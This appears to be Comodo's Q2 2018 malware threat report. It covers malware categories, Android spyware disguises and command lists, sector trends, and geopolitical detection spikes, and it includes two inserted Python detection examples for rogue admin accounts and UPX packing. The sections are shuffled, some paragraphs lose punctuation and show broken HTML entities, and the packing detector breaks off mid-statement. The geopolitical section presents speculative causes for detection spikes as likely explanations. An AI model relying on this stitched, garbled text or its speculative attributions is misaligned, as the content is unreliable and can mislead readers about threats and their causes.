"Joke" malware is just what it says: non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nevertheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Although Microsoft has labeled Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application category is alarming in that, in the course of everyday computer and Internet activity, users often inadvertently install these applications. For example, they include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such programs include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake antivirus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are second and third respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis

In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the number one malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not only in one but in multiple verticals, clearly making them a current strategic threat across the world.
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, Network Operator Name, SDK version, OS version, etc.), Call Log details and External Storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser's data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio and videos
Records screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control over Bluetooth Adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users:
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1 Adobe Flash Player
Version 2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltration into a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in a variety of disguises named below
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer, named CoinMiner.
How is this possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Chart: Android-targeted malware in April
4.2.2 May 2018
Chart: Android-targeted malware in May
4.2.3 June 2018
Chart: Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
5.2 High Threat Malware
In this section, we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
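The create-an-account-then-make-it-admin behaviour attributed to Starter above leaves a pair of Windows Security log events that a defender can correlate: 4720 (user account created) followed shortly by 4732 (member added to a security-enabled local group). The following is an added example written for this page, not Comodo's or Microsoft's code; it assumes events already parsed into dicts with the field names shown, and the sample events are constructed for the demo.

```python
"""Added example (not from the Comodo report): flag a freshly created local
account that is promptly added to the Administrators group, the behaviour the
report attributes to the Starter trojan.

Assumptions: Security-log events are pre-parsed into dicts with the fields used
below (EventID 4720 = user account created, 4732 = member added to a
security-enabled local group). SAMPLE_EVENTS is constructed, not real telemetry.
"""
from datetime import datetime, timedelta

ACCOUNT_CREATED = 4720
MEMBER_ADDED_TO_LOCAL_GROUP = 4732
ADMIN_GROUPS = {"administrators"}          # compared case-insensitively
DEFAULT_WINDOW = timedelta(minutes=15)     # creation -> admin within this is suspicious


def _ts(event):
    """Parse the ISO-8601 timestamp carried in the event dict."""
    return datetime.fromisoformat(event["time"])


def find_rogue_admin_accounts(events, window=DEFAULT_WINDOW):
    """Correlate 4720 -> 4732 pairs on the new account's SID.

    Matching on the SID (TargetSid in 4720, MemberSid in 4732) rather than the
    name avoids the common case where 4732 reports MemberName as "-".
    Returns one finding per account created and made admin within `window`.
    """
    created = {}   # SID -> the 4720 event that created it
    findings = []
    for ev in sorted(events, key=_ts):
        if ev["EventID"] == ACCOUNT_CREATED:
            created[ev["TargetSid"]] = ev
        elif (ev["EventID"] == MEMBER_ADDED_TO_LOCAL_GROUP
              and ev["TargetUserName"].lower() in ADMIN_GROUPS):
            origin = created.get(ev["MemberSid"])
            if origin is None:
                continue   # pre-existing account: an ordinary admin change
            delta = _ts(ev) - _ts(origin)
            if delta <= window:
                findings.append({
                    "host": ev["Computer"],
                    "account": origin["TargetUserName"],
                    "sid": origin["TargetSid"],
                    "created_by": origin["SubjectUserName"],
                    "group": ev["TargetUserName"],
                    "seconds_to_admin": int(delta.total_seconds()),
                })
    return findings


# Constructed sample events. The first pair mimics the Starter behaviour; the
# rest are benign noise (an existing user promoted, a new user promoted a day later).
SAMPLE_EVENTS = [
    {"time": "2018-06-02T09:14:03", "EventID": 4720, "Computer": "WS-17",
     "TargetUserName": "svc_remote", "TargetSid": "S-1-5-21-1-2-3-1108",
     "SubjectUserName": "jdoe"},
    {"time": "2018-06-02T09:14:05", "EventID": 4732, "Computer": "WS-17",
     "TargetUserName": "Administrators", "MemberName": "-",
     "MemberSid": "S-1-5-21-1-2-3-1108", "SubjectUserName": "jdoe"},
    {"time": "2018-06-02T10:30:00", "EventID": 4732, "Computer": "WS-17",
     "TargetUserName": "Administrators", "MemberName": "WS-17\\helpdesk",
     "MemberSid": "S-1-5-21-1-2-3-1001", "SubjectUserName": "itadmin"},
    {"time": "2018-06-02T11:00:00", "EventID": 4720, "Computer": "WS-17",
     "TargetUserName": "intern", "TargetSid": "S-1-5-21-1-2-3-1109",
     "SubjectUserName": "itadmin"},
    {"time": "2018-06-03T11:00:00", "EventID": 4732, "Computer": "WS-17",
     "TargetUserName": "Administrators", "MemberName": "WS-17\\intern",
     "MemberSid": "S-1-5-21-1-2-3-1109", "SubjectUserName": "itadmin"},
]

if __name__ == "__main__":
    for f in find_rogue_admin_accounts(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['account']} ({f['sid']}) created by "
              f"{f['created_by']} and added to {f['group']} after "
              f"{f['seconds_to_admin']}s")
```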
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
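As an added illustration of what the packer description above looks like on disk (this is not Comodo's code or tooling), the Python script below parses a PE file's section table and reports UPX-style packing signs: the stock UPX0/UPX1 section names and "UPX!" marker, plus the layout a renamed ("modified") UPX build still leaves behind, namely an empty first section reserving space for the unpacked image followed by a high-entropy packed section. The PE images it checks are constructed inline, and the entropy threshold is an assumption.

```python
"""Heuristic check for UPX-style packing in a PE file (added example)."""
import math
import struct
from dataclasses import dataclass
from typing import List


@dataclass
class Section:
    name: str
    virtual_size: int
    raw_size: int
    entropy: float


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; 8.0 is fully random, compressed data is ~7.5+."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> List[Section]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40  # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _vaddr, rsize, rptr = struct.unpack_from("<IIII", pe, off + 8)
        raw = pe[rptr:rptr + rsize]
        sections.append(Section(name, vsize, rsize, shannon_entropy(raw)))
    return sections


def packing_indicators(pe: bytes) -> List[str]:
    """Return the UPX-style packing signs found; an empty list means none."""
    secs = parse_sections(pe)
    hits = []
    # Stock UPX names its sections UPX0/UPX1 and leaves a "UPX!" marker.
    if any(s.name.upper().startswith("UPX") for s in secs):
        hits.append("upx-section-names")
    if b"UPX!" in pe:
        hits.append("upx-magic-marker")
    # A renamed ("modified") UPX keeps the tell-tale layout: the first section
    # has no raw bytes but a large virtual size (room for the unpacked image),
    # and the next section is dense, high-entropy packed data.
    if (len(secs) >= 2 and secs[0].raw_size == 0 and secs[0].virtual_size > 0
            and secs[1].entropy > 7.0):  # 7.0 bits/byte is an assumed threshold
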